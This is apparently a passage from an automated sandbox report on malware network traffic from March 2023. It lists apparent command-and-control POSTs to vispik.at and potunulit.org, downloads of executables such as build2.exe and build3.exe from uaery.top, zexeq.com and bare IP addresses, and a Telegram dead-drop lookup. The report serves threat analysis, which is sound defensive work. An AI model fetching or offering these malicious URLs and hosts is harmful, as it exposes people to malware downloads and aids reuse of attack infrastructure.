                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://xjjinqpvlc.com/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 284
                                    Host: vispik.at
                                    Response
                                    HTTP/1.0 404 Not Found
                                    Date: Sun, 19 Mar 2023 04:08:32 GMT
                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                    X-Powered-By: PHP/5.6.40
                                    Content-Length: 44
                                    Connection: close
                                    Content-Type: text/html; charset=utf-8
                                  • flag-it
                                    GET
                                    http://190.211.254.211/vokka.exe
                                    Remote address:
                                    190.211.254.211:80
                                    Request
                                    GET /vokka.exe HTTP/1.1
                                    Connection: Keep-Alive
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Host: 190.211.254.211
                                    Response
                                    HTTP/1.1 200 OK
                                    Server: nginx/1.14.2
                                    Date: Sun, 19 Mar 2023 04:08:33 GMT
                                    Content-Type: application/octet-stream
                                    Content-Length: 2822144
                                    Last-Modified: Sun, 19 Mar 2023 04:00:02 GMT
                                    Connection: keep-alive
                                    ETag: "641688c2-2b1000"
                                    Accept-Ranges: bytes
                                  • flag-us
                                    DNS
                                    191.59.80.34.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    191.59.80.34.in-addr.arpa
                                    IN PTR
                                    Response
                                    191.59.80.34.in-addr.arpa
                                    IN PTR
                                    191598034bcgoogleusercontentcom
                                  • flag-us
                                    DNS
                                    211.254.211.190.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    211.254.211.190.in-addr.arpa
                                    IN PTR
                                    Response
                                    211.254.211.190.in-addr.arpa
                                    IN PTR
                                    hostedby privatelayercom
                                  • flag-hu
                                    POST
                                    http://vispik.at/tmp/
                                    Remote address:
                                    176.226.127.181:80
                                    Request
                                    POST /tmp/ HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://xkurmi.com/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 311
                                    Host: vispik.at
                                    Response
                                    HTTP/1.0 404 Not Found
                                    Date: Sun, 19 Mar 2023 04:08:34 GMT
                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                    X-Powered-By: PHP/5.6.40
                                    Content-Length: 331
                                    Connection: close
                                    Content-Type: text/html; charset=utf-8
                                  • flag-hu
                                    POST
                                    http://vispik.at/tmp/
                                    Remote address:
                                    176.226.127.181:80
                                    Request
                                    POST /tmp/ HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://kcgti.org/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 202
                                    Host: vispik.at
                                    Response
                                    HTTP/1.0 404 Not Found
                                    Date: Sun, 19 Mar 2023 04:08:35 GMT
                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                    X-Powered-By: PHP/5.6.40
                                    Content-Length: 331
                                    Connection: close
                                    Content-Type: text/html; charset=utf-8
                                  • flag-hu
                                    POST
                                    http://vispik.at/tmp/
                                    Remote address:
                                    176.226.127.181:80
                                    Request
                                    POST /tmp/ HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://ffhoxximyv.org/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 343
                                    Host: vispik.at
                                    Response
                                    HTTP/1.0 404 Not Found
                                    Date: Sun, 19 Mar 2023 04:08:35 GMT
                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                    X-Powered-By: PHP/5.6.40
                                    Content-Length: 331
                                    Connection: close
                                    Content-Type: text/html; charset=utf-8
                                  • flag-hu
                                    POST
                                    http://vispik.at/tmp/
                                    Remote address:
                                    176.226.127.181:80
                                    Request
                                    POST /tmp/ HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://sbibped.net/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 189
                                    Host: vispik.at
                                    Response
                                    HTTP/1.0 404 Not Found
                                    Date: Sun, 19 Mar 2023 04:08:36 GMT
                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                    X-Powered-By: PHP/5.6.40
                                    Content-Length: 331
                                    Connection: close
                                    Content-Type: text/html; charset=utf-8
                                  • flag-hu
                                    POST
                                    http://vispik.at/tmp/
                                    Remote address:
                                    176.226.127.181:80
                                    Request
                                    POST /tmp/ HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://gxdgl.org/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 302
                                    Host: vispik.at
                                    Response
                                    HTTP/1.0 404 Not Found
                                    Date: Sun, 19 Mar 2023 04:08:36 GMT
                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                    X-Powered-By: PHP/5.6.40
                                    Content-Length: 331
                                    Connection: close
                                    Content-Type: text/html; charset=utf-8
                                  • flag-hu
                                    POST
                                    http://vispik.at/tmp/
                                    Remote address:
                                    176.226.127.181:80
                                    Request
                                    POST /tmp/ HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://qfagrotk.org/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 139
                                    Host: vispik.at
                                    Response
                                    HTTP/1.0 404 Not Found
                                    Date: Sun, 19 Mar 2023 04:08:37 GMT
                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                    X-Powered-By: PHP/5.6.40
                                    Content-Length: 331
                                    Connection: close
                                    Content-Type: text/html; charset=utf-8
                                  • flag-hu
                                    POST
                                    http://vispik.at/tmp/
                                    Remote address:
                                    176.226.127.181:80
                                    Request
                                    POST /tmp/ HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://wcgos.com/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 199
                                    Host: vispik.at
                                    Response
                                    HTTP/1.0 404 Not Found
                                    Date: Sun, 19 Mar 2023 04:08:37 GMT
                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                    X-Powered-By: PHP/5.6.40
                                    Content-Length: 331
                                    Connection: close
                                    Content-Type: text/html; charset=utf-8
                                  • flag-hu
                                    POST
                                    http://vispik.at/tmp/
                                    Remote address:
                                    176.226.127.181:80
                                    Request
                                    POST /tmp/ HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://lmywgbbph.org/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 211
                                    Host: vispik.at
                                    Response
                                    HTTP/1.0 404 Not Found
                                    Date: Sun, 19 Mar 2023 04:08:38 GMT
                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                    X-Powered-By: PHP/5.6.40
                                    Content-Length: 331
                                    Connection: close
                                    Content-Type: text/html; charset=utf-8
                                  • flag-hu
                                    POST
                                    http://vispik.at/tmp/
                                    Remote address:
                                    176.226.127.181:80
                                    Request
                                    POST /tmp/ HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://pgkcqo.com/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 173
                                    Host: vispik.at
                                    Response
                                    HTTP/1.0 404 Not Found
                                    Date: Sun, 19 Mar 2023 04:08:38 GMT
                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                    X-Powered-By: PHP/5.6.40
                                    Content-Length: 331
                                    Connection: close
                                    Content-Type: text/html; charset=utf-8
                                  • flag-hu
                                    POST
                                    http://vispik.at/tmp/
                                    Remote address:
                                    176.226.127.181:80
                                    Request
                                    POST /tmp/ HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://qypvsdyv.org/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 226
                                    Host: vispik.at
                                    Response
                                    HTTP/1.1 200 OK
                                    Date: Sun, 19 Mar 2023 04:08:39 GMT
                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                    X-Powered-By: PHP/5.6.40
                                    Content-Length: 0
                                    Connection: close
                                    Content-Type: text/html; charset=utf-8
                                  • flag-hu
                                    POST
                                    http://vispik.at/tmp/
                                    Remote address:
                                    176.226.127.181:80
                                    Request
                                    POST /tmp/ HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://mngounbb.org/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 156
                                    Host: vispik.at
                                    Response
                                    HTTP/1.0 404 Not Found
                                    Date: Sun, 19 Mar 2023 04:08:39 GMT
                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                    X-Powered-By: PHP/5.6.40
                                    Content-Length: 331
                                    Connection: close
                                    Content-Type: text/html; charset=utf-8
                                  • flag-us
                                    GET
                                    https://104.234.147.45/6Z5XNkxFUvVYB0Sj+25HTNO6FpthqXYI9W/0GhKw5oDCnXQgqhVJdUFenReNFcz+g6fiGoCYeiQxZYbD4h3bKp+JPcBTMZ696v1D9vkBGBdJ1kk3d9j8Z4HD4zvyS40S/F/mrzV4kQrTBWZzA9GA10kgAPSjRExn4qRNTS4hA2p1Zi/PcDkCslsk7JU29r8=
                                    rundll32.exe
                                    Remote address:
                                    104.234.147.45:443
                                    Request
                                    GET /6Z5XNkxFUvVYB0Sj+25HTNO6FpthqXYI9W/0GhKw5oDCnXQgqhVJdUFenReNFcz+g6fiGoCYeiQxZYbD4h3bKp+JPcBTMZ696v1D9vkBGBdJ1kk3d9j8Z4HD4zvyS40S/F/mrzV4kQrTBWZzA9GA10kgAPSjRExn4qRNTS4hA2p1Zi/PcDkCslsk7JU29r8= HTTP/1.1
                                    Host: 104.234.147.45
                                    Response
                                    HTTP/1.0 200 OK
                                    Server: Apache/2.4.7 (Ubuntu)
                                    Accept-Ranges: bytes
                                    Content-Type: application/octet-stream
                                    Content-Disposition: attachment; filename=CFE46B5638C3C85D9F4D7BD058C27813
                                    Connection: Close
                                    Content-Length: 3667232
                                    Connection: close
                                  • flag-hu
                                    POST
                                    http://vispik.at/tmp/
                                    Remote address:
                                    176.226.127.181:80
                                    Request
                                    POST /tmp/ HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://olriob.com/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 181
                                    Host: vispik.at
                                    Response
                                    HTTP/1.0 404 Not Found
                                    Date: Sun, 19 Mar 2023 04:08:40 GMT
                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                    X-Powered-By: PHP/5.6.40
                                    Content-Length: 331
                                    Connection: close
                                    Content-Type: text/html; charset=utf-8
                                  • flag-hu
                                    POST
                                    http://vispik.at/tmp/
                                    Remote address:
                                    176.226.127.181:80
                                    Request
                                    POST /tmp/ HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://etfcy.com/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 136
                                    Host: vispik.at
                                    Response
                                    HTTP/1.0 404 Not Found
                                    Date: Sun, 19 Mar 2023 04:08:40 GMT
                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                    X-Powered-By: PHP/5.6.40
                                    Content-Length: 331
                                    Connection: close
                                    Content-Type: text/html; charset=utf-8
                                  • flag-us
                                    DNS
                                    zexeq.com
                                    7C6.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    zexeq.com
                                    IN A
                                    Response
                                    zexeq.com
                                    IN A
                                    203.91.116.53
                                    zexeq.com
                                    IN A
                                    190.141.123.88
                                    zexeq.com
                                    IN A
                                    211.53.230.67
                                    zexeq.com
                                    IN A
                                    178.30.120.200
                                    zexeq.com
                                    IN A
                                    86.122.83.142
                                    zexeq.com
                                    IN A
                                    187.156.88.173
                                    zexeq.com
                                    IN A
                                    211.40.39.251
                                    zexeq.com
                                    IN A
                                    175.126.109.15
                                    zexeq.com
                                    IN A
                                    211.171.233.126
                                    zexeq.com
                                    IN A
                                    58.235.189.192
                                  • flag-iq
                                    GET
                                    http://uaery.top/dl/build2.exe
                                    D892.exe
                                    Remote address:
                                    185.95.186.58:80
                                    Request
                                    GET /dl/build2.exe HTTP/1.1
                                    User-Agent: Microsoft Internet Explorer
                                    Host: uaery.top
                                    Response
                                    HTTP/1.1 200 OK
                                    Date: Sun, 19 Mar 2023 04:08:40 GMT
                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                    Last-Modified: Mon, 13 Mar 2023 14:22:43 GMT
                                    ETag: "73800-5f6c8d8284590"
                                    Accept-Ranges: bytes
                                    Content-Length: 473088
                                    Connection: close
                                    Content-Type: application/octet-stream
                                  • flag-us
                                    DNS
                                    hoh0aeghwugh2gie.com
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    hoh0aeghwugh2gie.com
                                    IN A
                                    Response
                                    hoh0aeghwugh2gie.com
                                    IN A
                                    109.206.243.140
                                  • flag-nl
                                    POST
                                    http://hoh0aeghwugh2gie.com/
                                    Remote address:
                                    109.206.243.140:80
                                    Request
                                    POST / HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://owmccjp.net/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 367
                                    Host: hoh0aeghwugh2gie.com
                                    Response
                                    HTTP/1.1 404 Not Found
                                    Date: Sun, 19 Mar 2023 04:08:40 GMT
                                    Server: Apache/2.4.41 (Ubuntu)
                                    Connection: close
                                    Transfer-Encoding: chunked
                                    Content-Type: text/html; charset=utf-8
                                  • flag-mn
                                    GET
                                    http://zexeq.com/test2/get.php?pid=2E4297661923E929EC39E21858810F48&first=true
                                    D892.exe
                                    Remote address:
                                    203.91.116.53:80
                                    Request
                                    GET /test2/get.php?pid=2E4297661923E929EC39E21858810F48&first=true HTTP/1.1
                                    User-Agent: Microsoft Internet Explorer
                                    Host: zexeq.com
                                    Response
                                    HTTP/1.1 200 OK
                                    Date: Sun, 19 Mar 2023 04:08:40 GMT
                                    Server: Apache/2.4.37 (Win64) PHP/5.6.40
                                    X-Powered-By: PHP/5.6.40
                                    Content-Length: 559
                                    Connection: close
                                    Content-Type: text/html; charset=UTF-8
                                  • flag-us
                                    DNS
                                    45.147.234.104.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    45.147.234.104.in-addr.arpa
                                    IN PTR
                                    Response
                                  • flag-hu
                                    POST
                                    http://vispik.at/tmp/
                                    Remote address:
                                    176.226.127.181:80
                                    Request
                                    POST /tmp/ HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://rvtasltn.org/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 311
                                    Host: vispik.at
                                    Response
                                    HTTP/1.0 404 Not Found
                                    Date: Sun, 19 Mar 2023 04:08:40 GMT
                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                    X-Powered-By: PHP/5.6.40
                                    Content-Length: 331
                                    Connection: close
                                    Content-Type: text/html; charset=utf-8
                                  • flag-iq
                                    GET
                                    http://uaery.top/dl/build2.exe
                                    DBEE.exe
                                    Remote address:
                                    185.95.186.58:80
                                    Request
                                    GET /dl/build2.exe HTTP/1.1
                                    User-Agent: Microsoft Internet Explorer
                                    Host: uaery.top
                                    Response
                                    HTTP/1.1 200 OK
                                    Date: Sun, 19 Mar 2023 04:08:41 GMT
                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                    Last-Modified: Mon, 13 Mar 2023 14:22:43 GMT
                                    ETag: "73800-5f6c8d8284590"
                                    Accept-Ranges: bytes
                                    Content-Length: 473088
                                    Connection: close
                                    Content-Type: application/octet-stream
                                  • flag-mn
                                    GET
                                    http://zexeq.com/lancer/get.php?pid=2E4297661923E929EC39E21858810F48&first=false
                                    DBEE.exe
                                    Remote address:
                                    203.91.116.53:80
                                    Request
                                    GET /lancer/get.php?pid=2E4297661923E929EC39E21858810F48&first=false HTTP/1.1
                                    User-Agent: Microsoft Internet Explorer
                                    Host: zexeq.com
                                    Response
                                    HTTP/1.1 200 OK
                                    Date: Sun, 19 Mar 2023 04:08:41 GMT
                                    Server: Apache/2.4.37 (Win64) PHP/5.6.40
                                    X-Powered-By: PHP/5.6.40
                                    Content-Length: 563
                                    Connection: close
                                    Content-Type: text/html; charset=UTF-8
                                  • flag-hu
                                    POST
                                    http://vispik.at/tmp/
                                    Remote address:
                                    176.226.127.181:80
                                    Request
                                    POST /tmp/ HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://mvyodw.net/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 285
                                    Host: vispik.at
                                    Response
                                    HTTP/1.0 404 Not Found
                                    Date: Sun, 19 Mar 2023 04:08:41 GMT
                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                    X-Powered-By: PHP/5.6.40
                                    Content-Length: 331
                                    Connection: close
                                    Content-Type: text/html; charset=utf-8
                                  • flag-hu
                                    POST
                                    http://vispik.at/tmp/
                                    Remote address:
                                    176.226.127.181:80
                                    Request
                                    POST /tmp/ HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://notjy.com/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 315
                                    Host: vispik.at
                                    Response
                                    HTTP/1.0 404 Not Found
                                    Date: Sun, 19 Mar 2023 04:08:41 GMT
                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                    X-Powered-By: PHP/5.6.40
                                    Content-Length: 331
                                    Connection: close
                                    Content-Type: text/html; charset=utf-8
                                  • flag-us
                                    DNS
                                    140.243.206.109.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    140.243.206.109.in-addr.arpa
                                    IN PTR
                                    Response
                                  • flag-us
                                    DNS
                                    53.116.91.203.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    53.116.91.203.in-addr.arpa
                                    IN PTR
                                    Response
                                  • flag-mn
                                    GET
                                    http://zexeq.com/files/1/build3.exe
                                    D892.exe
                                    Remote address:
                                    203.91.116.53:80
                                    Request
                                    GET /files/1/build3.exe HTTP/1.1
                                    User-Agent: Microsoft Internet Explorer
                                    Host: zexeq.com
                                    Response
                                    HTTP/1.1 200 OK
                                    Date: Sun, 19 Mar 2023 04:08:42 GMT
                                    Server: Apache/2.4.37 (Win64) PHP/5.6.40
                                    Last-Modified: Sat, 31 Jul 2021 08:44:14 GMT
                                    ETag: "2600-5c86757379380"
                                    Accept-Ranges: bytes
                                    Content-Length: 9728
                                    Connection: close
                                    Content-Type: application/x-msdownload
                                  • flag-us
                                    DNS
                                    t.me
                                    build2.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    t.me
                                    IN A
                                    Response
                                    t.me
                                    IN A
                                    149.154.167.99
                                  • flag-nl
                                    GET
                                    https://t.me/zaskullz
                                    build2.exe
                                    Remote address:
                                    149.154.167.99:443
                                    Request
                                    GET /zaskullz HTTP/1.1
                                    X-Id: d6ef050131e7d5a1d595c51613328971
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0
                                    Host: t.me
                                    Response
                                    HTTP/1.1 200 OK
                                    Server: nginx/1.18.0
                                    Date: Sun, 19 Mar 2023 04:08:51 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Content-Length: 12345
                                    Connection: keep-alive
                                    Set-Cookie: stel_ssid=2a698208a056db331d_8244500222383029488; expires=Mon, 20 Mar 2023 04:08:51 GMT; path=/; samesite=None; secure; HttpOnly
                                    Pragma: no-cache
                                    Cache-control: no-store
                                    X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                    Content-Security-Policy: frame-ancestors https://web.telegram.org
                                    Strict-Transport-Security: max-age=35768000
                                  • flag-mn
                                    GET
                                    http://zexeq.com/files/1/build3.exe
                                    DBEE.exe
                                    Remote address:
                                    203.91.116.53:80
                                    Request
                                    GET /files/1/build3.exe HTTP/1.1
                                    User-Agent: Microsoft Internet Explorer
                                    Host: zexeq.com
                                    Response
                                    HTTP/1.1 200 OK
                                    Date: Sun, 19 Mar 2023 04:08:51 GMT
                                    Server: Apache/2.4.37 (Win64) PHP/5.6.40
                                    Last-Modified: Sat, 31 Jul 2021 08:44:14 GMT
                                    ETag: "2600-5c86757379380"
                                    Accept-Ranges: bytes
                                    Content-Length: 9728
                                    Connection: close
                                    Content-Type: application/x-msdownload
                                  • flag-us
                                    DNS
                                    99.167.154.149.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    99.167.154.149.in-addr.arpa
                                    IN PTR
                                    Response
                                  • flag-us
                                    DNS
                                    22.249.124.192.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    22.249.124.192.in-addr.arpa
                                    IN PTR
                                    Response
                                    22.249.124.192.in-addr.arpa
                                    IN PTR
                                    cloudproxy10022sucurinet
                                  • flag-de
                                    GET
                                    http://116.203.13.130/
                                    build2.exe
                                    Remote address:
                                    116.203.13.130:80
                                    Request
                                    GET / HTTP/1.1
                                    X-Id: d6ef050131e7d5a1d595c51613328971
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26/8mqLqMuL-37
                                    Host: 116.203.13.130
                                    Response
                                    HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 19 Mar 2023 04:08:52 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                  • flag-de
                                    GET
                                    http://116.203.13.130/edit.zip
                                    build2.exe
                                    Remote address:
                                    116.203.13.130:80
                                    Request
                                    GET /edit.zip HTTP/1.1
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26/8mqLqMuL-37
                                    Host: 116.203.13.130
                                    Cache-Control: no-cache
                                    Response
                                    HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 19 Mar 2023 04:08:52 GMT
                                    Content-Type: application/zip
                                    Content-Length: 2685679
                                    Last-Modified: Mon, 12 Sep 2022 13:14:59 GMT
                                    Connection: keep-alive
                                    ETag: "631f30d3-28faef"
                                    Accept-Ranges: bytes
                                  • flag-us
                                    DNS
                                    130.13.203.116.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    130.13.203.116.in-addr.arpa
                                    IN PTR
                                    Response
                                    130.13.203.116.in-addr.arpa
                                    IN PTR
                                    static13013203116clients your-serverde
                                  • flag-iq
                                    GET
                                    http://uaery.top/dl/build2.exe
                                    7C6.exe
                                    Remote address:
                                    185.95.186.58:80
                                    Request
                                    GET /dl/build2.exe HTTP/1.1
                                    User-Agent: Microsoft Internet Explorer
                                    Host: uaery.top
                                    Response
                                    HTTP/1.1 200 OK
                                    Date: Sun, 19 Mar 2023 04:08:54 GMT
                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                    Last-Modified: Mon, 13 Mar 2023 14:22:43 GMT
                                    ETag: "73800-5f6c8d8284590"
                                    Accept-Ranges: bytes
                                    Content-Length: 473088
                                    Connection: close
                                    Content-Type: application/octet-stream
                                  • flag-mn
                                    GET
                                    http://zexeq.com/files/1/build3.exe
                                    7C6.exe
                                    Remote address:
                                    203.91.116.53:80
                                    Request
                                    GET /files/1/build3.exe HTTP/1.1
                                    User-Agent: Microsoft Internet Explorer
                                    Host: zexeq.com
                                    Response
                                    HTTP/1.1 200 OK
                                    Date: Sun, 19 Mar 2023 04:08:57 GMT
                                    Server: Apache/2.4.37 (Win64) PHP/5.6.40
                                    Last-Modified: Sat, 31 Jul 2021 08:44:14 GMT
                                    ETag: "2600-5c86757379380"
                                    Accept-Ranges: bytes
                                    Content-Length: 9728
                                    Connection: close
                                    Content-Type: application/x-msdownload
                                  • flag-us
                                    DNS
                                    50.4.107.13.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    50.4.107.13.in-addr.arpa
                                    IN PTR
                                    Response
                                  • 172.67.181.144:80
                                    http://potunulit.org/
                                    http
                                    80.4kB
                                    3.5MB
                                    1442
                                    2660

                                    HTTP Request

                                    POST http://potunulit.org/

                                    HTTP Response

                                    404

                                    HTTP Request

                                    POST http://potunulit.org/

                                    HTTP Response

                                    404

                                    HTTP Request

                                    POST http://potunulit.org/

                                    HTTP Response

                                    404

                                    HTTP Request

                                    POST http://potunulit.org/

                                    HTTP Response

                                    404

                                    HTTP Request

                                    POST http://potunulit.org/

                                    HTTP Response

                                    404

                                    HTTP Request

                                    POST http://potunulit.org/

                                    HTTP Response

                                    404

                                    HTTP Request

                                    POST http://potunulit.org/

                                    HTTP Response

                                    404

                                    HTTP Request

                                    POST http://potunulit.org/

                                    HTTP Response

                                    404

                                    HTTP Request

                                    POST http://potunulit.org/

                                    HTTP Response

                                    404

                                    HTTP Request

                                    POST http://potunulit.org/

                                    HTTP Response

                                    404

                                    HTTP Request

                                    POST http://potunulit.org/

                                    HTTP Response

                                    404

                                    HTTP Request

                                    POST http://potunulit.org/

                                    HTTP Response

                                    404

                                    HTTP Request

                                    POST http://potunulit.org/

                                    HTTP Response

                                    404

                                    HTTP Request

                                    POST http://potunulit.org/

                                    HTTP Response

                                    404

                                    HTTP Request

                                    POST http://potunulit.org/

                                    HTTP Response

                                    404

                                    HTTP Request

                                    POST http://potunulit.org/

                                    HTTP Response

                                    404

                                    HTTP Request

                                    POST http://potunulit.org/

                                    HTTP Response

                                    404

                                    HTTP Request

                                    POST http://potunulit.org/

                                    HTTP Response

                                    404

                                    HTTP Request

                                    POST http://potunulit.org/

                                    HTTP Response

                                    404

                                    HTTP Request

                                    POST http://potunulit.org/

                                    HTTP Response

                                    404

                                    HTTP Request

                                    POST http://potunulit.org/

                                    HTTP Response

                                    404

                                    HTTP Request

                                    POST http://potunulit.org/

                                    HTTP Response

                                    404

                                    HTTP Request

                                    POST http://potunulit.org/

                                    HTTP Response

                                    404

                                    HTTP Request

                                    POST http://potunulit.org/

                                    HTTP Response

                                    404

                                    HTTP Request

                                    POST http://potunulit.org/

                                    HTTP Response

                                    404
                                  • 185.95.186.58:80
                                    http://uaery.top/dl/build.exe
                                    http
                                    23.5kB
                                    833.7kB
                                    406
                                    610

                                    HTTP Request

                                    GET http://uaery.top/dl/build.exe

                                    HTTP Response

                                    200
                                  • 45.9.74.80:80
